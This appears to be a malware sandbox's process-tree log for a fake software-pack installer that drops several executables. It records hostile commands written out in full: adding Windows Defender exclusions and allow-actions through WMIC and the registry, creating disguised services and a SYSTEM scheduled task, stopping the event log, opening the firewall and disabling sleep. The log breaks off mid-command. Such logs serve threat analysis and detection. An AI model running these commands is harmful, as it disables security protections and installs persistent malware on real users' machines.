        PID:7340
        
        C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
        
        "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\pending\f07a09ea-f7ff-43c5-8607-bc3ef9505ded.dmp"
        11⤵
        
        PID:4448
        
        C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
        
        "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\pending\8c003648-97be-4a79-b138-2c5deeaeab79.dmp"
        11⤵
        
        PID:5880
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5708 -childID 3 -isForBrowser -prefsHandle 4180 -prefMapHandle 5184 -prefsLen 29144 -prefMapSize 244658 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e040457-0e7d-4a76-aef0-877aaf73ddeb} 6264 "\\.\pipe\gecko-crash-server-pipe.6264" tab
        11⤵
        
        PID:5984
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5144 -childID 4 -isForBrowser -prefsHandle 5296 -prefMapHandle 912 -prefsLen 27077 -prefMapSize 244658 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eabf6b84-dd57-4b9b-8ffa-b0f34d763779} 6264 "\\.\pipe\gecko-crash-server-pipe.6264" tab
        11⤵
        
        PID:6252
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3016 -childID 5 -isForBrowser -prefsHandle 5860 -prefMapHandle 5856 -prefsLen 27077 -prefMapSize 244658 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a10f560f-0c7a-4f1f-bc57-4492c229608a} 6264 "\\.\pipe\gecko-crash-server-pipe.6264" tab
        11⤵
        
        PID:7512
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5952 -childID 6 -isForBrowser -prefsHandle 5960 -prefMapHandle 5964 -prefsLen 27077 -prefMapSize 244658 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2d58a297-9540-4563-b041-f9b6bea1120c} 6264 "\\.\pipe\gecko-crash-server-pipe.6264" tab
        11⤵
        
        PID:6256
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\DocumentsKKEHIEBKJK.exe"
    3⤵
    PID:1952
  - - C:\Users\Admin\DocumentsKKEHIEBKJK.exe
      "C:\Users\Admin\DocumentsKKEHIEBKJK.exe"
      4⤵
      PID:3644
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6AC9.tmp\6ACA.tmp\6ACB.bat C:\Users\Admin\DocumentsKKEHIEBKJK.exe"
        5⤵
        
        PID:4060
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
        6⤵
        
        PID:6296
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffa8429cc40,0x7ffa8429cc4c,0x7ffa8429cc58
        7⤵
        
        PID:3148
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1900,i,16038096604013807602,5631239610258973188,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=1896 /prefetch:2
        7⤵
        
        PID:4664
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2188,i,16038096604013807602,5631239610258973188,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2216 /prefetch:3
        7⤵
        
        PID:3176
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2276,i,16038096604013807602,5631239610258973188,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2288 /prefetch:8
        7⤵
        
        PID:6216
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3136,i,16038096604013807602,5631239610258973188,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3172 /prefetch:1
        7⤵
        
        PID:7088
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,16038096604013807602,5631239610258973188,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3204 /prefetch:1
        7⤵
        
        PID:4468
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
        6⤵
        
        PID:7008
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x12c,0x130,0x134,0x108,0x138,0x7ffa6f6546f8,0x7ffa6f654708,0x7ffa6f654718
        7⤵
        
        PID:6304
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2264,3066519010515192004,15389113951308303400,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2408 /prefetch:2
        7⤵
        
        PID:3840
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2264,3066519010515192004,15389113951308303400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 /prefetch:3
        7⤵
        
        PID:3416
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2264,3066519010515192004,15389113951308303400,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8
        7⤵
        
        PID:4356
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,3066519010515192004,15389113951308303400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
        7⤵
        
        PID:6204
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,3066519010515192004,15389113951308303400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
        7⤵
        
        PID:6256
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,3066519010515192004,15389113951308303400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4440 /prefetch:1
        7⤵
        
        PID:5600
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
        6⤵
        
        PID:5088
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
        7⤵
        
        PID:5236
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2076 -parentBuildID 20240401114208 -prefsHandle 1956 -prefMapHandle 1948 -prefsLen 25753 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {533b0ce1-6727-44f8-a910-1fc929adf497} 5236 "\\.\pipe\gecko-crash-server-pipe.5236" gpu
        8⤵
        
        PID:3848
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2500 -parentBuildID 20240401114208 -prefsHandle 2492 -prefMapHandle 2488 -prefsLen 26673 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e7ee17c-af4a-4812-a16b-b0407fd24415} 5236 "\\.\pipe\gecko-crash-server-pipe.5236" socket
        8⤵
        
        PID:7192
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3132 -childID 1 -isForBrowser -prefsHandle 3372 -prefMapHandle 3148 -prefsLen 22698 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a01decdc-a0d8-42fe-bb3c-d77a59e22cbe} 5236 "\\.\pipe\gecko-crash-server-pipe.5236" tab
        8⤵
        
        PID:7824
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3756 -childID 2 -isForBrowser -prefsHandle 3760 -prefMapHandle 3168 -prefsLen 31163 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {867cde95-c510-48cf-a338-cfb7e4c115d0} 5236 "\\.\pipe\gecko-crash-server-pipe.5236" tab
        8⤵
        
        PID:8016
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4816 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 2664 -prefMapHandle 2660 -prefsLen 31163 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d35bbbaf-c541-483c-ab7b-f7a0f851421f} 5236 "\\.\pipe\gecko-crash-server-pipe.5236" utility
        8⤵
        
        PID:8096
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5244 -childID 3 -isForBrowser -prefsHandle 5308 -prefMapHandle 4832 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {53617ccf-d0b9-4937-b2b3-29444ec9150b} 5236 "\\.\pipe\gecko-crash-server-pipe.5236" tab
        8⤵
        
        PID:6084
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5528 -childID 4 -isForBrowser -prefsHandle 5448 -prefMapHandle 5452 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7d47a409-92fe-4245-979e-bdf764e1f5da} 5236 "\\.\pipe\gecko-crash-server-pipe.5236" tab
        8⤵
        
        PID:7800
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5728 -childID 5 -isForBrowser -prefsHandle 5648 -prefMapHandle 5656 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {98237414-8f3d-433b-bd78-4a614f178586} 5236 "\\.\pipe\gecko-crash-server-pipe.5236" tab
        8⤵
        
        PID:7736
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Documents\SimpleAdobe\P1qvfDqMz6uu9mjPhx4Any0y.exe" & del "C:\ProgramData\*.dll"" & exit
    3⤵
    PID:3244
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 5
      4⤵
      Delays execution with timeout.exe
      PID:6424
- C:\Users\Admin\Documents\SimpleAdobe\B66QqW0nXeI6UMZBjMSMmjq4.exe
  C:\Users\Admin\Documents\SimpleAdobe\B66QqW0nXeI6UMZBjMSMmjq4.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:6284
- C:\Users\Admin\Documents\SimpleAdobe\yf5nxG49AzujxQA4_12jEqGY.exe
  C:\Users\Admin\Documents\SimpleAdobe\yf5nxG49AzujxQA4_12jEqGY.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4148
- - C:\Users\Admin\AppData\Local\Temp\7zSD38.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5764
  - - C:\Users\Admin\AppData\Local\Temp\7zS1779.tmp\Install.exe
      .\Install.exe /tdidS "385132" /S
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:1248
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:7160
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:7100
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:5260
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1820
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:3120
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bTVQzzKDZQMhkLPDbz" /SC once /ST 01:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS1779.tmp\Install.exe\" hU /NRdidnO 385132 /S" /V1 /F
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7116
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 1408
        5⤵
        Program crash
        
        PID:1220
- C:\Users\Admin\Documents\SimpleAdobe\egTQgQNB2JbPhVjfUa3ZuJYX.exe
  C:\Users\Admin\Documents\SimpleAdobe\egTQgQNB2JbPhVjfUa3ZuJYX.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  PID:2092
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5428
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:5856
- C:\Users\Admin\Documents\SimpleAdobe\7V3HZIzzI7EvdsS6nLiKgXtE.exe
  C:\Users\Admin\Documents\SimpleAdobe\7V3HZIzzI7EvdsS6nLiKgXtE.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4416
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\fcbrylcv\
    3⤵
    PID:1832
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\zxhikgjp.exe" C:\Windows\SysWOW64\fcbrylcv\
    3⤵
    PID:760
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" create fcbrylcv binPath= "C:\Windows\SysWOW64\fcbrylcv\zxhikgjp.exe /d\"C:\Users\Admin\Documents\SimpleAdobe\7V3HZIzzI7EvdsS6nLiKgXtE.exe\"" type= own start= auto DisplayName= "wifi support"
    3⤵
    - Launches sc.exe
    PID:6748
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" description fcbrylcv "wifi internet conection"
    3⤵
    - Launches sc.exe
    PID:6188
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" start fcbrylcv
    3⤵
    - Launches sc.exe
    PID:6952
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
    3⤵
    - Modifies Windows Firewall
    PID:4360
- C:\Users\Admin\Documents\SimpleAdobe\X0W5QTu6WhR5eXWulFNMZLZP.exe
  C:\Users\Admin\Documents\SimpleAdobe\X0W5QTu6WhR5eXWulFNMZLZP.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3824
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4060
- C:\Users\Admin\Documents\SimpleAdobe\_HNhcPFSY_dFjAHZPuGOzxIN.exe
  C:\Users\Admin\Documents\SimpleAdobe\_HNhcPFSY_dFjAHZPuGOzxIN.exe
  2⤵
  - Executes dropped EXE
  PID:540
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:6216
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:4352
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:1964
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:6472
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:5404
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:2248
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:4300
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:2280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1460

C:\Users\Admin\Downloads\Download_ _Programs_Pack_February_2019 exe_(1,22_Gb)_In_free_\setup.exe
"C:\Users\Admin\Downloads\Download_ _Programs_Pack_February_2019 exe_(1,22_Gb)_In_free_\setup.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3056

C:\Users\Admin\Downloads\Download_ _Programs_Pack_February_2019 exe_(1,22_Gb)_In_free_\setup.exe
"C:\Users\Admin\Downloads\Download_ _Programs_Pack_February_2019 exe_(1,22_Gb)_In_free_\setup.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4912

C:\Windows\SysWOW64\fcbrylcv\zxhikgjp.exe
C:\Windows\SysWOW64\fcbrylcv\zxhikgjp.exe /d"C:\Users\Admin\Documents\SimpleAdobe\7V3HZIzzI7EvdsS6nLiKgXtE.exe"
1⤵
PID:6152
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  PID:2940

C:\Windows\system32\eventvwr.exe
"C:\Windows\system32\eventvwr.exe"
1⤵
PID:6748
- C:\Windows\system32\mmc.exe
  "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc"
  2⤵
  PID:5100

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
1⤵
PID:5868

C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
1⤵
PID:1064
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1628
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:744
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:5436
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:6876
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:5912
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:6356

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:4608

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5480

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4804 -ip 4804
1⤵
PID:6620

C:\Users\Admin\AppData\Local\Temp\7zS1779.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS1779.tmp\Install.exe hU /NRdidnO 385132 /S
1⤵
PID:7312
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD 